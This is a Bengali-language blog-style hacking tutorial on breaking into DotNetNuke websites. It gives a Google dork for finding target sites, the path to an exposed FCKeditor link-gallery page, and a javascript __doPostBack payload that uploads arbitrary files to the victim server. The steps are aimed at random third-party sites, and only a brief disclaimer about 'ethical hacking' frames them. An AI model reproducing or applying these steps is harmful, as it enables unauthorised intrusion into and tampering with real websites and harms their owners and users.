meee

আসসালামু আলাইকুম, সবাইকে আবারও আজকের হ্যাকিংয়ের টিউনে স্বাগতম। কেমন আছেন সবাই?  আশা করি সবাই মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আবারও আপনাদের সামনে হাজির হয়েছে আরেকটি হ্যাকিংয়ের টিউন নিয়ে। আজকের পর্বে আপনাদের দেখাব DNN এর মাধ্যমে একটা ওয়েবসাইট হ্যাকিং করা। খুবই মজা হবে তাই না? তাহলে চলূন মূল পর্বে….

আমরা তো হ্যাকিং করব! কিভাবে করব? DNN এর মাধ্যমে। কিন্তু আপনারা কি DNN এর পূর্ণরূপ জানেন? DNN এর পূর্ণ রূপ হল DotNetNuke. এখন হয়ত আপনাদের কাছে একটু কঠিন মনে হয়। টিউনে শেষে বলবেন যে, এটা তো এক্কেবারে সহজ। বলতে গেলে SQL-Injection ও Cross Site Scripting এর মতো। আমি আজ দেখাব আপনার টার্গেটের সাই্টটি হ্যাকিং করে ফাইল আপলোড করা। মূলতঃ DotNetNuke হল Microsoft .NET technology এর উপর তৈরি করা বিভিন্ন ওয়েবসাইট প্লাটফরম।

এই টিউনের কেউ অপব্যবহার করবেন না। এটি শুধু মাত্র শিখার জন্য, কারও ক্ষতি করার উদ্দেশ্যে নয়। কেউ এই টিউনে অপব্যবহার করে কারও ক্ষতি করলে টিজে দায়ী নয়।

হ্যাকিং শুরু

• প্রথমে Google Dorks দিয়ে একটি একটি ওয়েবসাইটকে টার্গেট করব।

inurl:”/portals/0″ site:.com 

• এখানে দেখেন কোডটির শেষে .com দেয়া আছে। আপনি ইচ্ছা করলে আপনার ইচ্ছা মতো ডোমেইন ব্যবহার করতে পারবেন। যেমন- bd, ph, ae, net, org ইত্যাদি
• এবার কোডটি Google এ সার্চ দিন।
• তাহলে আপনাকে সার্চ রেজাল্টে অনেকগুলো  ওয়েবসাইটের ফলাফল দিবে।
• এবার এখান থেকে একটিকে টার্গেট করুন। মানে একটির উপর ক্লিক করুন।
• মনে করি আপনি এই সাই্টটিকে টার্গেট করলেন www.victim.com
• এখন আমরা এই সাইটটির vulnerability পরীক্ষা করব।
• এজন্য নিচের কোডটি সাইট লিংকের পরে বসিয়ে এন্টার দিন।

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

• লিংকের পরে বসালে হবে

www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• এবার যদি নিচের ছবির মতো আসে, তাহলে বুঝবেন যে এটিকে হ্যাকিং করা যাবে।

• এবার এখান থেকে শেষের অপশানটি নির্বাচন করুন “A File On Your Site”
• এবার নিচের কোডটি লিংকের ঘরে লিখুন।

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

• যদি আপনি সব কিছু পারেন, তাহলে আপনি এই সাইটে .swf .jpg .gif .pdf ফাই্ল আপলোড করতে পারবেন।
• আপনি আপনার ফাই্ল আপলোড করার পর আপনার ফাইলের লিংক পাবেন এই রকম

www.victim.com/portals/0/yourfile.extension

• মনে করুন আপনি b.txtফাইল আপলোড করেছেন, তাহলে হবে এই রকম।

www.victim.com/portals/0/b.txt

• তাহলে হবে এই রকম

• হা হা হা হা হা হা হা হা। কেমন লাগল? আশা করি এখন আপনি নিজে নিজেই পারবেন।

এখন আপনারা প্রশ্ন করতে পারবেন যে, যদি আমি নির্দিষ্ট সাই্ট হ্যাকিং করতে চাই, তাহলে কি করব?

উত্তর হবে, এটা হল Ethical Hacking টিউটোরিয়াল। এটা Black Hat হ্যাকিং টিউটোরিয়াল নয়। তাই্ আমি এভাবেই দিলাম।

সবাই্ ভাল থাকবেন, ধন্যবাদ। আল্লাহ হাফেজ……..